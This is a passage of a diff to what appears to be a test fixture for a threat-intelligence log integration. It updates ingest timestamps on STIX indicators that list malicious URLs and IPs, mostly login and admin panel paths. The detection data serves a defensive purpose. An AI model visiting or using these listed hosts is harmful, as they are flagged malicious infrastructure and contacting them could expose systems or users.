89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:19.99Z\"}", "category": "threat", "type": "indicator", @@ -394,7 +394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022589700Z", + "ingested": "2021-12-14T14:57:43.118155743Z", "original": "{\"created\":\"2020-01-22T02:59:20.155Z\",\"description\":\"TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f9c6386b-dba2-41f9-8160-d307671e5c8e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-22T02:59:20.155Z\",\"name\":\"mal_url: http://ntrcgroup.com/nze/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:20.155Z\"}", "category": "threat", "type": "indicator", @@ -446,7 +446,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022595Z", + "ingested": "2021-12-14T14:57:43.118156326Z", "original": "{\"created\":\"2020-01-22T02:59:25.521Z\",\"description\":\"TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--98fad53e-5389-47f7-a3ff-44d334af2d6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T02:59:25.521Z\",\"name\":\"mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:25.521Z\"}", "category": "threat", "type": "indicator", @@ -497,7 +497,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022602600Z", + "ingested": "2021-12-14T14:57:43.118156797Z", "original": "{\"created\":\"2020-01-22T02:59:25.626Z\",\"description\":\"TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--76c01735-fb76-463d-9609-9ea3aedf3f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T02:59:25.626Z\",\"name\":\"mal_url: http://f0390764.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0390764.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:25.626Z\"}", "category": "threat", "type": "indicator", @@ -542,7 +542,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022609900Z", + "ingested": "2021-12-14T14:57:43.118157183Z", "original": "{\"created\":\"2020-01-22T02:59:36.461Z\",\"description\":\"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T02:59:36.461Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:36.461Z\"}", "category": "threat", "type": "indicator", @@ -594,7 +594,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022646200Z", + "ingested": "2021-12-14T14:57:43.118157870Z", "original": "{\"created\":\"2020-01-22T02:59:41.193Z\",\"description\":\"TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--6f0d8607-21cb-4738-9712-f4fd91a37f7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-22T02:59:41.193Z\",\"name\":\"mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.193Z\"}", "category": "threat", "type": "indicator", @@ -645,7 +645,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022651100Z", + "ingested": "2021-12-14T14:57:43.118158517Z", "original": "{\"created\":\"2020-01-22T02:59:41.228Z\",\"description\":\"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime\",\"id\":\"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:41.228Z\",\"name\":\"mal_url: http://89.160.20.156/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.228Z\"}", "category": "threat", "type": "indicator", @@ -690,7 +690,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022654800Z", + "ingested": "2021-12-14T14:57:43.118158964Z", "original": "{\"created\":\"2020-01-22T02:59:51.313Z\",\"description\":\"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--408ebd2d-063f-4646-b2e7-c00519869736\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-22T02:59:51.313Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.313Z\"}", "category": "threat", "type": "indicator", @@ -735,7 +735,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022660300Z", + "ingested": "2021-12-14T14:57:43.118159376Z", "original": "{\"created\":\"2020-01-22T02:59:51.372Z\",\"description\":\"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-22T02:59:51.372Z\",\"name\":\"mal_ip: 192.168.119.172\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.119.172']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.372Z\"}", "category": "threat", "type": "indicator", @@ -786,7 +786,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022666400Z", + "ingested": "2021-12-14T14:57:43.118159905Z", "original": "{\"created\":\"2020-01-22T02:59:51.442Z\",\"description\":\"TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--6f3a4a2b-62e3-48ef-94ae-70103f09cf7e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:51.442Z\",\"name\":\"mal_url: http://f0389246.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0389246.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.442Z\"}", "category": "threat", "type": "indicator", @@ -838,7 +838,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022671300Z", + "ingested": "2021-12-14T14:57:43.118160411Z", "original": "{\"created\":\"2020-01-22T03:00:01.563Z\",\"description\":\"TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--213519c9-f511-4188-89c8-159f35f08008\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-22T03:00:01.563Z\",\"name\":\"mal_url: http://appareluea.com/server/cp.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://appareluea.com/server/cp.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:01.563Z\"}", "category": "threat", "type": "indicator", @@ -890,7 +890,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022675600Z", + "ingested": "2021-12-14T14:57:43.118160796Z", "original": "{\"created\":\"2020-01-22T03:00:03.138Z\",\"description\":\"TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--5a563c85-c528-4e33-babe-2dcff34f73c4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T03:00:03.138Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot2/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot2/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.138Z\"}", "category": "threat", "type": "indicator", @@ -942,7 +942,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022681200Z", + "ingested": "2021-12-14T14:57:43.118161328Z", "original": "{\"created\":\"2020-01-22T03:00:03.396Z\",\"description\":\"TS ID: 55241332363; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f3e33aab-e2af-4c15-8cb9-f008a37cf986\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:00:03.396Z\",\"name\":\"mal_url: http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.396Z\"}", "category": "threat", "type": "indicator", @@ -994,7 +994,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022686400Z", + "ingested": "2021-12-14T14:57:43.118161879Z", "original": "{\"created\":\"2020-01-22T03:00:03.642Z\",\"description\":\"TS ID: 55241332320; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--f03f098d-2fa9-49e1-a7dd-02518aa105fa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:00:03.642Z\",\"name\":\"mal_url: http://mecharnise.ir/ca4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mecharnise.ir/ca4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.642Z\"}", "category": "threat", "type": "indicator", @@ -1046,7 +1046,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022690600Z", + "ingested": "2021-12-14T14:57:43.118162298Z", "original": "{\"created\":\"2020-01-22T03:00:27.534Z\",\"description\":\"TS ID: 55241332367; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e72e3ba0-7de5-46bb-ab1e-efdf3e0a0b3b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:00:27.534Z\",\"name\":\"mal_url: http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:27.534Z\"}", "category": "threat", "type": "indicator", @@ -1098,7 +1098,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022695200Z", + "ingested": "2021-12-14T14:57:43.118162685Z", "original": "{\"created\":\"2020-01-22T03:00:27.591Z\",\"description\":\"TS ID: 55241332317; iType: mal_url; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--d6b59b66-5020-4368-85a7-196026856ea9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-22T03:00:27.591Z\",\"name\":\"mal_url: http://kironofer.com/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kironofer.com/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:27.591Z\"}", "category": "threat", "type": "indicator", @@ -1150,7 +1150,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022699300Z", + "ingested": "2021-12-14T14:57:43.118163250Z", "original": "{\"created\":\"2020-01-22T03:00:45.787Z\",\"description\":\"TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--aff7b07f-acc7-4bec-ab19-1fce972bfd09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T03:00:45.787Z\",\"name\":\"mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.787Z\"}", "category": "threat", "type": "indicator", @@ -1202,7 +1202,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022706200Z", + "ingested": "2021-12-14T14:57:43.118163745Z", "original": "{\"created\":\"2020-01-22T03:00:45.841Z\",\"description\":\"TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime\",\"id\":\"indicator--ba71ba3a-1efd-40da-ab0d-f4397d6fc337\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-22T03:00:45.841Z\",\"name\":\"mal_url: http://smartlinktelecom.top/kings/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.841Z\"}", "category": "threat", "type": "indicator", @@ -1254,7 +1254,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022711900Z", + "ingested": "2021-12-14T14:57:43.118164141Z", "original": "{\"created\":\"2020-01-22T03:00:45.959Z\",\"description\":\"TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--17777e7f-3e91-4446-a43d-79139de8a948\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-22T03:00:45.959Z\",\"name\":\"mal_url: http://carirero.net/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://carirero.net/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.959Z\"}", "category": "threat", "type": "indicator", @@ -1299,7 +1299,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022719600Z", + "ingested": "2021-12-14T14:57:43.118164643Z", "original": "{\"created\":\"2020-01-22T03:00:46.025Z\",\"description\":\"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-01-22T03:00:46.025Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:46.025Z\"}", "category": "threat", "type": "indicator", @@ -1350,7 +1350,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022727Z", + "ingested": "2021-12-14T14:57:43.118165162Z", "original": "{\"created\":\"2020-01-22T03:00:57.729Z\",\"description\":\"TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b4fd8489-9589-4f70-996c-84989245a21b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-01-22T03:00:57.729Z\",\"name\":\"mal_url: http://tuu.nu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tuu.nu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:57.729Z\"}", "category": "threat", "type": "indicator", @@ -1402,7 +1402,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022734400Z", + "ingested": "2021-12-14T14:57:43.118165546Z", "original": "{\"created\":\"2020-01-22T03:01:02.696Z\",\"description\":\"TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime\",\"id\":\"indicator--bc50c62f-a015-4460-87df-2137626877e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-01-22T03:01:02.696Z\",\"name\":\"mal_url: http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:02.696Z\"}", "category": "threat", "type": "indicator", @@ -1454,7 +1454,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022741900Z", + "ingested": "2021-12-14T14:57:43.118165946Z", "original": "{\"created\":\"2020-01-22T03:01:02.807Z\",\"description\":\"TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--2765af4b-bfb7-4ac8-82d2-ab6ed8a52461\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-01-22T03:01:02.807Z\",\"name\":\"mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:02.807Z\"}", "category": "threat", "type": "indicator", @@ -1506,7 +1506,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022749200Z", + "ingested": "2021-12-14T14:57:43.118166459Z", "original": "{\"created\":\"2020-01-22T03:01:24.81Z\",\"description\":\"TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--9c0e63a1-c32a-470a-bf09-51488e239c63\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T03:01:24.81Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:24.81Z\"}", "category": "threat", "type": "indicator", @@ -1551,7 +1551,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022756600Z", + "ingested": "2021-12-14T14:57:43.118166926Z", "original": "{\"created\":\"2020-01-22T03:01:41.158Z\",\"description\":\"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:01:41.158Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:41.158Z\"}", "category": "threat", "type": "indicator", @@ -1603,7 +1603,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022764Z", + "ingested": "2021-12-14T14:57:43.118167313Z", "original": "{\"created\":\"2020-01-22T03:01:57.189Z\",\"description\":\"TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime\",\"id\":\"indicator--c57a880c-1ce0-45de-9bab-fb2910454a61\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T03:01:57.189Z\",\"name\":\"mal_url: http://35.158.92.3/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://35.158.92.3/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.189Z\"}", "category": "threat", "type": "indicator", @@ -1648,7 +1648,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022771300Z", + "ingested": "2021-12-14T14:57:43.118167775Z", "original": "{\"created\":\"2020-01-22T03:01:57.279Z\",\"description\":\"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-42\"],\"modified\":\"2020-01-22T03:01:57.279Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.279Z\"}", "category": "threat", "type": "indicator", @@ -1700,7 +1700,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022775800Z", + "ingested": "2021-12-14T14:57:43.118168266Z", "original": "{\"created\":\"2020-01-22T03:02:50.57Z\",\"description\":\"TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--23215acb-4989-4434-ac6d-8f9367734f0f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:02:50.57Z\",\"name\":\"mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:02:50.57Z\"}", "category": "threat", "type": "indicator", @@ -1751,7 +1751,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022780400Z", + "ingested": "2021-12-14T14:57:43.118169190Z", "original": "{\"created\":\"2020-01-22T03:02:52.496Z\",\"description\":\"TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--452ece92-9ff2-4f99-8a7f-fd614ebea8cf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-26\"],\"modified\":\"2020-01-22T03:02:52.496Z\",\"name\":\"mal_url: http://f0391600.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391600.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:02:52.496Z\"}", "category": "threat", "type": "indicator", @@ -1803,7 +1803,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022784800Z", + "ingested": "2021-12-14T14:57:43.118169601Z", "original": "{\"created\":\"2020-01-22T03:03:42.819Z\",\"description\":\"TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--10958d74-ec60-41af-a1ab-1613257e670f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-01-22T03:03:42.819Z\",\"name\":\"mal_url: http://extraclick.space/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://extraclick.space/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:03:42.819Z\"}", "category": "threat", "type": "indicator", @@ -1855,7 +1855,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022790300Z", + "ingested": "2021-12-14T14:57:43.118170109Z", "original": "{\"created\":\"2020-01-22T03:03:52.044Z\",\"description\":\"TS ID: 55241332326; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--19556daa-6293-400d-8706-d0baa6b16b7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:03:52.044Z\",\"name\":\"mal_url: http://petrogarmani.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petrogarmani.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:03:52.044Z\"}", "category": "threat", "type": "indicator", @@ -1907,7 +1907,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022794500Z", + "ingested": "2021-12-14T14:57:43.118170552Z", "original": "{\"created\":\"2020-01-22T03:04:01.65Z\",\"description\":\"TS ID: 55241332311; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b09d9be9-6703-4a7d-a066-2baebb6418fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T03:04:01.65Z\",\"name\":\"mal_url: http://worldatdoor.in/mighty/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/mighty/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:01.65Z\"}", "category": "threat", "type": "indicator", @@ -1958,7 +1958,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022798700Z", + "ingested": "2021-12-14T14:57:43.118170982Z", "original": "{\"created\":\"2020-01-22T03:04:32.717Z\",\"description\":\"TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime\",\"id\":\"indicator--43febf7d-4185-4a12-a868-e7be690b14aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-22T03:04:32.717Z\",\"name\":\"mal_url: http://zanlma.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zanlma.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:32.717Z\"}", "category": "threat", "type": "indicator", @@ -2009,7 +2009,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022802600Z", + "ingested": "2021-12-14T14:57:43.118171474Z", "original": "{\"created\":\"2020-01-22T03:04:56.858Z\",\"description\":\"TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--a34728e6-f91d-47e6-a4d8-a69176299e45\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-22T03:04:56.858Z\",\"name\":\"mal_url: http://f0369688.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0369688.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:56.858Z\"}", "category": 